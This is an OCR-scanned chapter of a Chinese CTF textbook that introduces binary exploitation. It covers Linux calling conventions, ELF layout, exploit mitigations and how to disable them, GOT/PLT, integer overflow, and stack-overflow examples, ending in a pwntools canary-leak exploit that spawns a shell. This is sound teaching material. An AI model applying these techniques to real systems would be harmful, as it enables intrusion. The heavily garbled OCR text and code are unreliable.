。 二 进 制 安全 入 门 的 门槛 比较 高 ， 需 要 参赛 者 很 长 一 段 时 间 的 学 习 和 积 容 ， 具 有 一 定 的 知识 储备 后 
才能 入 门 。 这 导致 很 多 初学 者 在 入 门 前 就 放弃 了 。 想 要 入 门 PWN， 一 定 的 逆向 工程 基础 是 必 不 可 少 
的 ， 这 又 导致 PWN 参 赛 者 更 加 稀少 。 


本 章 目 的 是 带领 读者 入 门 ， 所 以 会 着 重 介绍 PWN 的 漏洞 利用 技巧 。 有 关 基 础 知识 的 部 分 由 于 篇 幅 所 
限 ， 无 法 详细 介绍 。 如 果 读 者 学 习 过 程 中 发 现 不 理解 的 地 方 ， 可 以 先 花 一 些 时 间 了 解 相关 基础 知识 ， 
再 回头 考虑 如 何 解决 ， 也 许 束 会 窜 然 开朗 。 


二 进 制 安全 的 核心 知识 主要 包括 四 大 类 。 
1. 编程 语言 和 编译 原理 


通常 ，CTF 中 的 PWN 题 目 会 用 C/C+ + 语言 编写 。 为 了 编写 攻击 脚本 ， 学 会 Python 这 样 的 脚本 语言 也 
是 必修 课 。 另 外 ， 不 排除 用 C/C++ 之 外 的 语言 编写 PWN 题 目的 可 能 ， 如 Java 或 者 Lua 语 言 。 所 以 ， 参 
赛 者 广泛 涉猎 一 些 主流 语言 是 有 必要 的 。 


对 于 逆向 工程 来 说 ， 如 何 更 好 、 更 快 地 反 编 译 都 是 一 个 难题 。 无 论 是 手工 反 汇 编 ， 还 是 编写 自动 化 代 
码 分析 和 漏洞 挖 气 工具， 编译 原理 的 知识 是 非 党 有益 的 。 

2. 汇编 语言 

汇编 语言 作为 逆向 工程 的 核心 内 容 ， 也 是 PWN 初 学 者 要 面 对 的 第 一 道 坎 。 如 果 涉 足 二 进 制 领域 ， 汇 编 


语言 是 绕 不 过 去 的 。 只 有 从 底层 理解 了 CPU 是 如 何 工作 的 ， 才 能 理解 为 何 通过 程序 漏洞 ， 攻 击 者 可 以 
让 程序 执行 所 设置 的 代码 。 

3. 操作 系统 和 计算 机 体系 结构 

操作 系统 作为 运行 在 计算 机 的 核心 软件 ， 经 党 是 攻击 者 PWN 的 目标 。 要 理解 一 个 程序 到 底 如 何 被 执 
行 ， 如 何 完成 各 种 各 样 的 工作 ， 参 赛 者 就 必须 学 习 操 作 系 统 和 计算 机 体系 结构 的 相关 知识 。 在 CTF 


中 ， 很 多 漏洞 的 利用 手段 和 技巧 也 需要 借助 操作 系统 的 一 些 特 性 来 达成 。 并 且 ， 对 于 逆向 并 理解 一 个 
程序 来 说 ， 操 作 系 统 的 知识 也 是 必要 的 。 


4. 数据 结构 和 算法 


编程 总 是 绕 不 开 数 据 结构 和 算法 。 逆 向 工程 也 是 如 此 ， 如 果 想 理解 程序 执行 的 逻辑 ， 了 解 其 使 用 的 算 
法 和 数据 结构 是 必要 的 。 
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以 上 与 其 说 是 二 进 制 安全 的 核心 ， 不 如 说 是 计算 机 科学 的 核心 知识 。 如 果 将 各 种 漏洞 技巧 比 作 武 侠 小 
说 中 各 种 招式 ， 这 些 知 识 就 是 武侠 中 的 “内 功 ” 了 。 招 式 易学 目 有 限 ， 但 是 提升 自己 “内 功 ” 的 道路 
却 是 没有 止境 的 。 提 升 自 己 二 进 制 水 平 重要 的 不 是 去 学 习 各 种 人 花哨 的 利用 技巧 ， 而 是 路 踏实 实 地 化 时 
间 学 习 这 些 基 本 知识 。 


可 惜 一 些 程序 员 和 信息 安全 从 业者 往往 急于 求 成 ， 急 于 学 习 各 种 漏洞 利用 技巧 。 这 些 计 算 机 科学 的 核 
心 内 容 反 而 没有 认真 学 习 。 读 者 若 真心 希望 在 CTF 中 取得 好 成 绩 ， 并 且 在 真正 的 现实 漏洞 挖掘 中 有 所 
建树 ， 这 些 基础 内 容 往往 比 各 种 利用 技巧 更 重要 。 切 勿 “ 浮 沙 筑 高 人 台 ”。， 掉 入 只 学 习 各 种 PWN 技 巧 的 
陷阱 中 。 


6.1.3 Linux 基 础 知识 


目前 的 CTF 中 绝 大 部 分 PWN 题 目 使 用 的 环境 是 Linux 平 台 ， 因 此 掌握 相关 Linux 基 础 知识 是 十 分 必要 
的 。 下 面 主 要 介绍 Linux 中 与 PWN 利 用 息息相关 的 内 容 。 


6.1.3.1 Linux 中 的 系统 与 图 数 调用 


与 32 位 Windows 程 序 一 样 ，32 位 Linux 程 序 在 运行 过 程 中 也 遵循 栈 平 衡 的 原则 。ESP 和 EBP 作为 栈 指 
针 和 帧 指针 寄存 器 ，EAX 作 为 返回 值 。 根 据 源 代码 和 编译 结果 ( 见 图 6-1-1) 就 能 看 出 ， 其 参数 传递 
方式 遵循 传统 的 cdecl 调 用 约定 ， 即 函数 参数 从 右 到 左 依次 入 栈 ， 函 数 参数 由 调用 者 负责 清除 。 


而 64 位 Linux 程 序 使 用 fast call 的 调用 方式 进行 传 参 。 同 样 源码 编译 的 64 位 版 本 与 32 位 的 主要 区 别 
是 ， 函 数 的 前 6 个 参数 会 依次 使 用 RDI、RSI、RDX、RCX、R8、R9 寄 存 器 进行 传递 ， 如 果 还 有 多 余 的 
参数 ， 那 么 与 32 位 的 一 样 使 用 栈 进行 传递 ， 见 图 6-1-2。 


PWN 过 程 中 也 经 常 需要 直接 调用 操作 系统 提供 的 API 函 数 。 与 在 Windows 中 使 用 “win32 api” 逊 数 
调用 系统 API 不 同 ，Linux 简 洁 的 系统 调用 也 是 一 大 特色 。 


在 32 位 Linux 操 作 系 统 中 ， 调 用 系统 调用 需要 执行 int 0x80 软 中 断 指令 。 此 时 ，eax 中 保存 系统 调用 
号 ， 系 统 调用 的 参数 依次 保存 在 EBX、ECX、EDX、ESI、EDI、EBP 寄 存 器 中 。 调 用 的 返回 结果 保存 
在 EAX 中 。 其 实 ， 系 统 调 用 可 以 看 成 一 种 特殊 的 函数 调用 ， 只 是 使 用 int 0x80 指 令 代 蔡 call 指 令 。call 
指令 中 的 函数 地 址 变 成 了 存放 在 EAX 中 的 系统 调用 号 ， 而 参数 改 成 使 用 寄存 器 进行 传递 。 相 较 于 32 位 
系统 ，64 位 Linux 系 统 调用 指令 变 成 了 syscall ， 传 递 参数 的 寄存器 变 成 了 RDI、RSI、RDX、R10、R 
8、R9， 并 且 系 统 调用 对 应 的 系统 调用 号 发 生 了 变化 。 对 read 系 统 调用 的 示例 见 图 6-1-3。 


DUD 和 
run proc near 


var_C= dword ptr -eCh 
; unwind { 


ebp 
ebp, esp 


esp, 18h 
3 


2 

有 

func 

esp，6Ch 
[ebp+var_C], eax 
esp, 8 
[ebp+var_C] 
offset format 
“printf 

esp，16h 


ret = func(1,2,3); 


; } // starts at 8648426 printf("%d", ret); 
run endp 
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public run 
run proc near 


var_4= dword ptr -4 


[rbp+var_4], eax 

eax, [rbp+var_4] 

全 Si ， 拉 XX 

edi, offset format ; "%d" 
大 总 光 ， 向 

_printf 





Linux 操 作 系 统 现 有 的 系统 调用 只 有 300 多 个 ， 随 着 内 核 版 本 的 更 新 ， 其 数量 未 来 可 能 会 增加 ， 但 相 比 
Windows 庞 杂 的 AP| 来 说 算是 相当 精简 了 。 人 至 于 每 个 系统 调用 对 应 的 调用 号 和 应 该 传 入 的 参数 ， 读 者 
可 以 查阅 Linux 帮 助手 册 。 


6.1.3.2 ELF 文 件 结构 


Linux 下 的 可 执行 文件 格式 为 ELF (Executable and Linkable Format) ， 类 似 Windows 的 PE 格 
式 。ELF 文 件 格式 比较 简单 ，PWN 人 参赛 者 最 需要 了 解 的 是 ELF 头 、Section ( 节 ) 、Segment ( 段 ) 
的 概念 。 
ELF 头 必须 在 文件 开头 ， 表 示 这 是 个 ELF 文 件 及 其 基本 信息 。 ELF 头 包括 ELF 的 magic code、 程 序 运行 
的 计算 机 架构 、 程 序 入 口 等 内 容 ， 可 以 通过 “readelf-h” 命令 读 取 其 内 容 ， 一 般 用 于 寻找 一 些 程序 
的 入 口 。 


ELF 文 件 由 多 个 节 (Section) 组 成 ， 其 中 存放 各 种 数据 。 摘 述 节 的 各 种 信息 的 数据 统一 人 存 放 在 节 头 表 
中 。ELF 中 的 节 用 来 存放 各 种 各 样 不 同 的 数据 ， 主 要 包括 : 


他 .text 节 一 一 存放 一 个 程序 的 运行 所 需 的 所 有 代码 。 
他 .rdata 节 一 一 存放 程序 使 用 到 的 不 可 修改 的 静态 数据 ， 如 字符 串 等 。 
% .data 节 一 一 存放 程序 可 修改 的 数据 ， 如 Ci 语 言 中 已 经 初始 化 的 全 局 变量 等 。 


信 .bss 节 一 一 用 于 存放 程序 的 可 修改 数据 ， 与 .data 不 同 的 是 ， 这 些 数 据 没有 被 初始 化 ， 所 以 
没有 占用 ELF 空 间 。 虽 然 在 节 头 表 中 存在 .bss 节 ， 但 是 文件 中 并 没有 对 应 的 数据 。 在 程序 开始 
执行 后 ， 系 统 才 会 申请 一 块 空 内 人 存 来 作为 实际 的 .bss 节 。 


入 .plt 节 和 .got 节 一 一 程序 调用 动态 链接 库 (SO 文件 ) 中 国 数 时 ， 需 要 这 两 个 节 配 合 ， 以 获 
取 被 调用 函数 的 地 址 。 


由 于 ELF 格 式 的 可 扩展 性 ， 甚 至 在 编译 链接 程序 时 还 可 以 创建 自 定义 的 节 区 。ELF 中 其 实 可 以 包括 很 多 
与 程序 执行 无 天 的 内 容 ， 如 程序 版 本 、Hash 或 者 一 些 符 号 调试 信息 等 。 但 是 操作 系统 执行 ELF 程 序 时 


- 2 
各 Ce 全 站 人 全 Fr 一 二 = a YY [le sy 
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Eas J 二 I 蝗 域 ， 0 字 导 V1THJXE H 人 注 庆 dlc 


文件 头 的 目的 是 确定 程序 的 指令 集 构架 、ABI 版 本 等 系统 是 否 支 持 信 息 ， 以 及 读 取 程序 入 口 。 然 后 ， EE 

解析 程序 头 表 来 确定 需要 加 载 的 程序 段 。 程 序 头 表 其 实 是 一 个 程序 头 (Program Head) 结构 体 
数组 ， 其 中 的 每 项 都 包含 这 个 段 的 描述 信息 。 与 Windows 一 样 ，Linux 也 有 内 存 映 射 文件 功能 。 操 作 
系统 执行 程序 时 需要 按照 程序 头 表 中 指定 的 段 信 息 来 将 ELF 文 件 中 的 指定 内 容 加 载 到 内 存 的 指定 位 
置 。 所 以 ， 每 个 程序 头 的 内 容 主要 包括 段 类 型 、 其 在 ELF 文 件 中 的 地 址 、 加 载 到 内 存 中 的 哪个 地 址 、 
段 长 度 、 内 存 读 写 属性 等 。 


比如 ，ELF 中 存放 代码 的 段 内 存 读 写 属 性 是 可 读 可 执行 ， 存 放 数 据 的 段 则 是 可 读 可 写 或 者 只 读 等 。 注 
意 ， 有 些 段 可 能 在 ELF 文 件 中 没有 对 应 的 数据 内 容 ， 如 未 初始 化 的 静态 内 存 ， 为 了 压缩 ELF 文 件 ， 只 会 
在 程序 头 表 中 存在 一 个 字段 ， 由 操作 系统 进行 内 存 申请 和 置 零 的 操作 。 操 作 系统 也 不 会 天 心 每 个 段 中 
的 具体 内 容 ， 只 需 按照 要 求 加 载 各 段 ， 并 将 PC 指针 指向 程序 入 口 。 


这 里 可 能 有 人 会 对 节 与 段 之 间 的 关系 及 其 区 别 产 生 疑 惑 ， 其 实 二 者 只 是 解释 ELF 中 数据 的 两 种 形式 而 
已 。 融 像 一 个 人 有 多 种 身份 ，ELF 同 时 使 用 段 和 节 两 种 格式 摘 述 一 段 数据 ， 只 是 侧重 点 不 同 。 操 作 系 
统 不 需要 关心 ELF 中 的 数据 具体 功能 ， 只 需 知 道 哪 一 块 数据 应 该 被 加 载 到 哪 一 块 内 存 ， 以 及 内 存 的 读 
写 属性 即 可 ， 所 以 会 按照 段 来 划分 数据 。 


而 编译 器 、 调 试 器 或 者 IDA 更 需要 知道 数据 代表 的 合 义 ， 融 会 按照 节 来 解析 划分 数据 。 通 弟 ， 节 比 段 
更 细 分 ， 如 .text、rdata 往 往 会 划分 为 一 个 段 。 有 些 纯粹 用 来 摘 述 程序 的 附加 信息 ， 而 与 程序 运行 无 
天 的 节 甚 至 会 没有 对 应 的 段 ， 在 程序 运行 过 程 中 也 不 会 加 载 到 内 存 。 


6.1.3.3 Linux 下 的 漏洞 缓解 措施 


现代 操作 系统 使 用 了 很 多 手段 来 缓解 计算 机 被 漏洞 攻击 的 风险 ， 这 些 手段 被 统称 为 漏洞 缓解 措 施 。 
1. NX 


NX 保护 在 Windows 中 也 被 称 为 DEP， 是 通过 现代 操作 系统 的 内 存 保护 单元 (Memory Protect 让 
ni 

，MPU) 机 制 对 程序 内 存 按 页 的 粒度 进行 权限 设置 ， 其 基本 规则 为 可 写 权 限 与 可 执行 权限 互 斥 。 

此 ， 在 开启 NX 保 护 的 程序 中 不 能 直接 使 用 shellcode 执 行 任意 代码 。 所 有 可 以 被 修改 写 入 shellcode 

的 内 存 都 不 可 执行 ， 所 有 可 以 被 执行 的 代码 数据 都 是 不 可 被 修改 的 。 

GCC 默认 开局 NX 人 保护， 关闭 方 法 是 在 编译 时 加 入 “-z execstack” 参数。 


PA 4 ol :TFTA 


Stack Canary 保 护 是 专门 针对 栈 浇 出 攻击 设计 的 一 种 保护 机 制 。 由 于 栈 ; 兽 出 攻击 的 主要 目标 是 通过 洪 
出 履 荔 消 数 栈 高 位 的 返回 地 址 ， 因 此 其 思路 是 在 遂 数 开始 执行 前 ， 即 在 返回 地 址 前 写 入 一 个 字 长 的 随 
机 数据 ， 在 立 数 返回 前 校 验 该 值 是 否 被 改变 ， 如 果 被 改变 ， 则 认为 是 友 生 了 栈 溢出 。 程 序 会 直接 终 
LE 


GCC 默认 使 用 stack Canary 保 护 ， 关 闭 方 法 是 在 编译 时 加 入 “-fno-stack-protector” 参 数 。 
3. ASLR(Address Space Layout Randomization) 


AsLR 的 目的 是 将 程序 的 堆栈 地 址 和 动态 链接 库 的 加 载 地 址 进行 一 定 的 随机 化 ， 这 些 地 址 之 间 是 不 可 
读 写 执 行 的 未 映射 内 存 ， 降 低 攻击 者 对 程序 内 存 结构 的 了 解 程 序 。 这 样 ， 即 使 攻击 者 布置 了 i 

shellcode 
并 可 以 控制 跳 转 ， 由 于 内 存 地 址 结构 未 类， 依然 无 法 执行 shellcode。 
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ASLR 是 系统 等 级 的 保护 机 制 ， 关 闭 方 式 是 修改 /proc/sys/kernel/randomize_va_space 文 件 的 内 
容 为 0。 


4. PIE 


与 ASLR 保 护 十 分 相似 ，PIE 保 护 的 目的 是 让 可 执行 程序 ELF 的 地 址 进行 随机 化 加 载 ， 从 而 使 得 程序 的 
内 存 结 构 对 攻击 者 完全 未 知 ， 进 一 步 提 高 程序 的 安全 性 。 


GCC 编 译 时 开启 PIE 的 方法 为 添加 参数 “-fpic-pie”。 较 新 版 本 GCC 默 认 开 启 PIE， 可 以 设置 “-no- 
pie 
"S53 


5. Full Relro 


Full Relro 保 护 与 Linux 下 的 Lazy Binding 机 制 有 关 ， 其 主要 作用 是 禁止 .GOT.PLT 表 和 其 他 一 些 相 关内 
存 的 读 写 ， 从 而 阻止 攻击 者 通过 写 .GOT.PLT 表 来 进行 攻击 利用 的 手段 。 


GCC 开局 Full Relro 的 方法 是 添加 参数 “-z relro” 。 


6.1.3.4 GOT 和 PLT 的 作用 


ELF 文 件 中 通 剃 存在 .GOT.PLT 和 和 .PLT 这 两 个 特殊 的 节 ，ELF 编 译 时 无 法 知道 libc 等 动态 链接 库 的 加 载 地 
址 。 如 果 一 个 程序 想 调 用 动态 链接 库 中 的 负数 ， 残 必须 使 用 .GOT.PLT 和 .PLT 配 合 完成 调用 。 


在 图 6-1-4 中 ，call_printf 并 不 是 跳 转 到 了 实际 的 _printf 消 数 的 位 置 。 因 为 在 编译 时 程序 并 不 能 确定 ”. 

nin 

国 数 的 地 址 ， 所 以 这 个 call 指 令 实际 上 通过 相对 跳 转 ， 跳 转 到 了 PLT 表 中 的 _printf 项 。 图 6-1-5 中 
束 是 PLT 对 应 _printf 的 项 。ELF 中 所 有 用 到 的 外 部 动态 链接 库 函 数 都 会 有 对 应 的 PLT 项 目 。 


.PLT 表 还 是 一 段 代 码 ， 作 用 是 从 内 存 中 取出 一 个 地 址 然后 跳 转 。 取 出 的 地 址 便 是 _printf 的 实际 地 址 ， 
而 存放 这 个 _printf 消 数 实际 地 址 的 地 方丈 是 图 6-1-6 中 的 .GOT.PLT 表 。 


edi, offset unk 4666E4 
eax, 9 

__isoc99 scanf 

rax, [rbp+var 18] 

rsi, rax 

edi, offset format ; “%p\n" 
eaxXx, 0 

_printf 

eaxXx, 8 

rdx, [rbp+var 8] 

rdx, fs:28h 

short Jocret_46665A 


图 6-1-4 


;sess2eessesnesse SUBROUTINE 
6 
; Attributes: thunk 
6 
8 ; int printf(const char *format, ...) 
_printf 


proc near ; CODE XREF: main+4641p 
cs:off 691626 


提 风 网 昌 遇 昌 昌 网 昌 昌 外 
Oooooooo 


8 qwo _69 机 DATA oe a _48664A01r 
让 ot . .plt: 6: ; DATA XRE b_4664A6+6Tr 
.Ecot.plt:6666699996691918 off _681618 dq offse stack_chk_fail 
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ees plt:e e000000000601620 off_601020 


图 6-1-6 


可 以 友 现 ，.GOT.PLT 表 其 实 是 一 个 函数 据 针 数组 ， 数 组 中 保存 着 ELF 中 所 有 用 到 的 外 部 闹 数 的 地 址 。. 
GOT.PLT 表 的 初始 化 工作 则 由 操作 系统 来 完成 。 


当然 ， 由 于 Linux 非 常 特殊 的 Lazy Binding 机 制 。 在 没有 开局 Full Rello 的 ELF 中 ，.GOT.PLT 表 的 初始 
化 是 在 第 一 次 调用 该 销 数 的 过 程 中 完成 的 。 也 丈 是 说 ， 某 个 遂 数 必须 被 调用 过 ，.GOT.PLT 表 中 才 会 存 
放水 数 的 真实 地 址 。 有 关 Lazy Binding 机 制 在 此 不 骨 蒙 述 ， 有 兴趣 的 读者 可 以 自行 查阅 相关 资料 。 


那么 ，.GOT.PLT 和 .PLT 对 于 PWN 来 襄 有 什么 作用 呢 ” 首先 ，.PLT 可 以 直接 调用 有 菏 个 外 部 函数 ， 这 在 

后 续 介 绍 的 栈 溢 出 中 会 有 很 大 的 帮助 。 其 次 ， 由 于 .GOT.PLT 中 通常 会 存放 libc 中 国 数 的 地 址 ， 在 漏洞 

利用 中 可 以 通过 读 取 .GOT.PLT 来 获得 libc 的 地 址 ， 或 者 通过 写 .GOT.PLT 来 控制 程序 的 执行 流 。 通 通过 
.PLT 进 行 漏洞 利用 在 CTF 中 十 分 党 
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6.2 整数 溢出 

整数 溢出 在 PWN 中 属于 比较 简单 的 内 容 ， 当 然 并 不 是 说 整数 溢出 的 题目 比较 简单 ， 只 是 整数 溢出 本 上 自 
不 是 很 复杂 ， 情 况 较 少 而 已 。 但 是 整数 溢出 本 身 是 无 法 利用 的 ， 需 要 结合 其 他 手段 才能 达到 利用 的 目 
的 。 

6.2.1 整数 的 运算 


计算 机 并 不 能 存储 无 限 大 的 整数 ， 计 算 机 中 的 整数 类 型 代表 的 数值 只 是 目 然 数 的 一 个 子 集 。 比 如 在 32 
位 《程序 中 ，unsigned int 类 型 的 长 度 是 32 位 ， 能 表示 的 最 大 的 数 是 0xffffffff。 如 果 将 这 个 数 加 1， 其 
结果 0x100000000 融 会 超过 32 位 能 表示 的 学 围 ， 而 只 能 截取 其 低 32 位 ， 最 终 这 个 数字 融会 变 为 0。 这 
束 是 无 符号 上 注 。 


计算 机 中 有 4 种 溢出 情况 ， 以 32 位 整数 为 例 。 
4 无 符号 上 溢 : 无 符号 数 Oxffffffff 加 1 变 为 0 的 情况 。 
4 无 符号 下 溢 : 无 符号 数 0 减 去 1 变 为 0xfffffff 的 情况 。 


作 有 符号 上 溢 : 有 符号 数 正 数 0x7ffffff 甸 0 1 变 为 负数 0x80000000， 即 十 进 制 -2147483648 
的 情况 。 


4 无 符号 下 溢 : 有 符号 负数 0x80000000 减 去 1 变 为 正 数 0x7fffffff 的 情况 。 


除 此 之 外 ， 有 符号 数字 与 无 符号 数 直 接 的 转换 会 导致 整数 大 小 突变 。 比 如 ， 有 符号 数字 -1 和 无 符号 数 
字 0xfffffff 的 二 进 制 表 示 是 相同 的 ， 二 者 直接 进行 转换 会 导致 程序 产生 非 预 期 的 效果 。 


6.2.2 整数 ,得 出 如 何 利 用 


整数 ; 益 出 虽然 很 合 单 ， 但 是 利用 起 来 实际 上 并 不 人 简单。 整数 ; 浇 出 不 像 栈 浇 出 等 内 存 破 坏 可 以 直接 通过 
禾 六 内存 进 行 利 用 ， 常 剃 需 要 进行 一 定 转 换 才 能 ; 浇 出 。 弟 见 的 转换 方式 有 两 种 。 


1. 整数 溢出 转换 成 缓冲 区 浇 出 


整数 溢出 可 以 将 一 个 很 小 的 数 突变 成 很 大 的 数 。 比 如 ， 无 符号 下 溢 可 以 将 一 个 表示 缓冲 区 大 小 的 较 小 
全 三 
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太一 可 情 /元 是 塌 过 斩 入 多 效 的 办 ) 去 米 红 过 一 些 长 卢 枪 合 ， 旭 一 些 枉 夺 会 使 用 和 朋 付 亏 族 子 表 趟 长 度 。 于 
么 器 可 以 使 用 负数 来 绕 过 长 度 上 限 检查 。 而 大 多 数 系统 APlI 使 用 无 从 号 数 来 表示 长 度 ， 此 时 负数 束 会 
变 成 超大 的 正 数 导致 溢出 。 


2. 整数 溢出 转 数 组 越界 


数组 越界 的 思路 很 沿 单 。 在 C 语 言 中 ， 数 组 索引 的 操作 只 是 简单 地 将 数组 指针 加 上 索引 来 实现 ， 并 
会 检查 边界 。 因 此 ， 很 大 的 索引 会 访问 到 数组 后 的 数据 ， 如 果 京 引 是 负数 ， 那 么 还 会 访问 到 数组 之 前 
的 内 和 存 。 


通常 ， 整 数 ; 益 出 转 数组 越界 更 弟 见 。 在 数组 泰 引 的 过 程 中 ， 数 组 奏 引 还 要 乘 以 数组 元 素 的 长 度 来 计算 
元 素 的 实际 地 址 。 以 int 类 型 数组 为 例 ， 数 组 奏 引 需要 乘 以 4 来 计算 偏 移 。 假 如 通过 传 入 负数 来 绕 过 1 
界 检查 ， 那 么 正 芝 情况 下 只 能 访问 数组 之 前 的 内 人 存 。 但 由 于 索引 会 被 乘 以 4， 那 么 依然 可 以 索引 数组 
后 的 数据 甚至 整个 内 人 存 空间 。 例 如 ， 想 要 论 引 数组 后 0x1000 字 节 处 的 内 容 ， 从 证 要 全 人 Rd 

， 该 值 用 十 六 进 制 数 表示 为 0x80000400， 再 乘 以 元 素 长 度 4 后 ， 由 于 无 符号 整数 上 溢 结 果 ， 即 


为 0x00001000。 可 以 看 到 ， 与 整数 洛 出 转 缓冲 区 溢出 相 比 ， 数 组 越界 更 容易 利用 。 
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6.3 村!) 得 出 


栈 (stack) 是 一 种 简单 且 经 典 的 数据 结构 ， 最 主要 的 特点 是 使 用 先进 后 出 (FILO) 的 方式 存 取 栈 中 
的 数据 。 一 般 情 况 下 ， 最 后 放 入 栈 中 的 数据 被 称 为 栈 项 数据 ， 其 存放 的 位 置 被 称 为 栈 项 。 同 栈 中 存放 
数据 的 操作 被 称 为 入 栈 (push) ， 取 出 栈 顶 数据 的 操作 被 称 为 出 栈 (pop) 。 有 关 栈 的 详细 内 容 可 L 
参考 数据 结构 相关 贷 料 。 


由 于 消 数 调用 的 循序 也 是 最 先 调 用 的 函数 最 后 返回 ， 因 此 栈 非 常 适合 保存 消 数 运行 过 程 中 使 用 到 的 中 
上 则 变量 和 其 他 临时 数据 。 


目前 ， 大 部 分 主流 指令 构架 (x86、ARM、MIPS 等 ) 都 在 指令 集 层面 支持 栈 操作 ， 并 且 设 计 有 专门 
的 寄存 器 保存 栈 顶 地 址 。 大 部 分 情况 下 ， 将 数据 入 栈 会 导致 栈 硕 从 内 和 存 高 地 址 向 低地 址 增长 。 


1. 栈 洲 出 原理 


栈 注 出 是 组 ;中 区 洲 出 中 的 一 种 。 尔 数 的 局 部 变量 通常 保存 企 酰 上。 如果 这 些 组 站 区 发 生 洪 出 ， 就 是 配 
洲 出 。 最 经 典 的 栈 ; 浇 出 利用 方式 是 窗 蘑 消 数 的 返回 地 址 ， 以 达到 支持 程序 控制 流 的 目的 。 


Xx86 构 架 中 一 般 使 用 指令 call 调 用 一 个 消 数 ， 并 使 用 指令 ret 返 回 。CPU 在 执行 cal 指 令 时 ， 会 先 将 当前 
call 指 令 的 下 一 条 指令 的 地 址 入 栈 ， 再 跳 转 到 被 调用 消 数 。 当 被 调用 冰 数 需要 返回 时 ， 只 需要 执行 ret 
Du yl Ed= [VEAE :| 
数 什 么 位 置 的 地 址 被 称 为 返回 地 址 。 理 想 情 况 下 ， 取 出 的 地 址 就 是 之 前 调用 call 存 入 的 地 址 。 这 样 程 
序 可 以 返回 到 父 函数 继续 执行 了 。 编 译 器 会 始终 保证 即使 子 函数 使 用 了 栈 并 修改 了 栈 顶 的 位 置 ， 也 会 
在 函数 返回 前 将 栈 顶 恢复 到 了 刚 进入 函数 时 候 的 状态 ， 从 而 保证 取 到 的 返回 地 址 不 会 出 错 。 


【 例 6-3-1]】 


#include<stdio.h> 

#include<unistd.h> 

void shell() { 
system("/bin/sh"); 


void vuln() { 
char buf[190]; 
gets(buf); 


int main() { 
vuln(); 


} 


使 用 如 下 命令 进行 编译 例 6-3-1 的 程序 ， 关 闭 地 址 随机 化 和 栈 ; 浴 出 保护 。 


gcc -fno-stack-protector stack.c -0 stack -no-pie 


运行 程序 ， 用 IDA 调 试 ， 输 入 8 个 A 后 ， 退 出 vuln 尔 数 ， 程 序 执行 ret 指 令 时 ， 栈 布局 见 图 6-3-1。 上 上 
时 ， 栈 顶 保 和 三 的 0x400579 即 返回 地 址 ， 执 行 ret 指 令 后 ， 程 序 会 跳 转 到 0x400579 的 位 置 。 
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注意 ， 返 回 地 址 上 方 有 一 串 0x4141414141414141 的 数据 ， 即 刚刚 输入 的 8 个 A， 因 为 gets 函 数 不 会 
检查 输入 数据 的 长 度 ， 所 以 可 以 增加 输入 ， 直 到 黎 兰 返回 地 址 。 从 图 6-3-1 可 以 看 出 ， 返 回 地 址 与 第 
一 个 A 的 距 亢 为 18 字 三 ， 如 果 输 入 19 字 三 以 上 ， 则 会 禾 蓄 返回 地 址 。 


用 IDA 分 析 这 个 程序 ， 可 以 得 知 shell 函 数 的 位 置 为 0x400537， 我 们 的 目的 是 让 程序 跳 转 到 该 函数 ， 
从 而 执行 system ("/bin/sh") ， 以 获得 一 个 shell。 


po al SU NE Sy: 
码 注释 中 会 对 其 中 一 些 划 用 的 函数 进行 说明 ， 更 具体 的 况 明 请 参照 官方 文档 。 


攻击 脚本 如 下 : 


用 IDA 附 加 到 进程 进行 跟踪 调试 ， 刚 到 ret 的 位 置 时 ， 返 回 地 址 已 经 被 覆盖 为 0x400537， 继 续 运 行程 
序 器 会 跳 转 到 shell 冰 数 ， 从 而 获得 shell ( 见 图 6-3-2) 。 
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S| 
Ce 二 


2. 栈 保护 技术 


栈 ;并 出 利用 难度 很 低 ， 危 害 巨 大 。 为 了 缓解 栈 ; 浇 出 市 来 的 日 益 严 重 的 安全 问题 ， 编 译 器 开发 者 们 引 
Canary 机 制 来 检测 栈 浇 出 攻击 。 


Canary 中 文 译 为 金 丝 人 锥 。 以 前 矿工 进入 矿井 时 都 会 随身 市 一 只 金 丝 件 ， 通 过 观察 金 丝 稚 的 状态 来 判断 
氧气 浓度 等 情况 。Canary 保 护 的 机 制 与 此 类 似 ， 通 过 在 栈 保 存 rbp 的 位 置 前 插入 一 段 随机 数 ， 这 样 如 
果 攻 击 者 利用 栈 溢 出 漏洞 覆盖 返回 地 址 ， 也 会 把 Canary 一 起 履 盖 。 编 译 器 会 在 国 数 ret 指 令 前 添加 
允 会 检查 Canary 的 值 是 否 被 改写 的 代码 。 如 果 被 改写 ， 则 直接 抛 出 异常 ， 中 断 程序 ， 从 而 阻止 攻击 大 
= 


但 是 这 种 方法 并 不 一 定 可 靠 ， 如 例 6-3-2。 


【 例 6-3-2】 


#include<stdio.h> 
#include<unistd.h> 
void shell() { 
system("/bin/sh"); 
| 
void vuln() { 
char buf[10]; 
puts("input 1:"); 
read(0, buf, 100); 
puts(buf); 
puts("input 2:"); 
fgets(buf, Ox100, stdin); 
} 
int main() { 
vuln(); 
L 


编译 时 开启 栈 保护 : 


gcc stack2.c -no-pie -fstack-protector-aLL -0 stack2 


vuln 函 数 进 入 时 ,会 从 fs: 28 中 取出 Canary 的 值 ， 放 入 rbp-8 的 位 置 ， 任 潢 数 退 出 前 将 rbp-8 的 值 二 
: 28 中 的 值 进行 比较 ， 如 果 被 改变 ， 就 调用 ”stack_chk fail 函 数 ， 输 出 报错 信息 并 退出 程序 ( 见 图 
6-3-3 和 图 6-3-4) 。 


public vuln 
proc near 


= byte ptr -12h 


[rbp+var_8], rax 

eax, eax 

rdi, s ES 
_puts 


rdx，cs:_bss_start ; stream 
rax, [rbp+buf] 

esi, 186h 

rdi, rax -六 

_fgets 


rax, [rbp+var_8] 
rax, fs:28h 
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SE pr chk-fai il 


但 是 这 个 程序 在 vuln 上 函数 返回 前 会 将 输入 的 字符 串 打 印 ， 这 会 泄露 栈 上 的 Canary， 从 而 绕 过 检测 。 这 
里 可 以 将 字符 串 长 度 控 制 到 刚好 连接 Canary， 残 可 以 使 得 canary 和 字符 串 一 起 被 puts 国 数 打印 。 由 
于 Canary 最 低 字 节 为 Ox00， 为 了 防止 被 0 截断 ， 需 要 多 发 送 一 个 字符 来 覆盖 0x00。 


p=process('./stack2') 
[x] Starting local process './stack2' 
[+] Starting local process './stack2': pid 11858 


# 接收 到 指定 字符 串 为 止 
# 接收 7 个 字符 


接 下 来 的 一 次 输入 中 ， 可 以 将 泄露 的 Canary 写 到 原来 的 地 址 ， 然 后 继续 覆盖 返回 地 址 : 


>>>shell_addr = p64(Qx400677) 
>>> p.sendLine('a'*10+canary+p64(9)+p64(sheLL_addr)) 
0) 


>>> p.interactive 
[*] Switching to interactive mode 
ls 


